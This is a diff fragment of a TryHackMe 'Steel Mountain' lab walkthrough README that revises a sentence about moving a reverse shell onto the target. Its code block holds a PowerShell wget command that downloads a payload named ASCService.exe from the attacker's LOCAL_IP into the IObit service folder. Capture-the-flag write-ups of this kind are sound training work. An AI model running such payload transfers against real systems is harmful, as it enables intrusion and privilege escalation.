EvanDiamantidis/TryHackMe/Machines/Steel Mountain/README.md

 <br />

-Transfer the reverse shell to the target via the `python` server we used to connect to this machine earlier if it is still running in the background, otherwise set up a temporary one from scratch.
+Transfer the reverse shell to the target via the `python` server we used to connect to this machine earlier if it is still running in the background, otherwise go ahead an set up a temporary one again.

 ```
 C:\Program Files (x86)\IObit\Advanced SystemCare>powershell -c wget "http://LOCAL_IP:80/ASCService.exe" -outfile "ASCService.exe"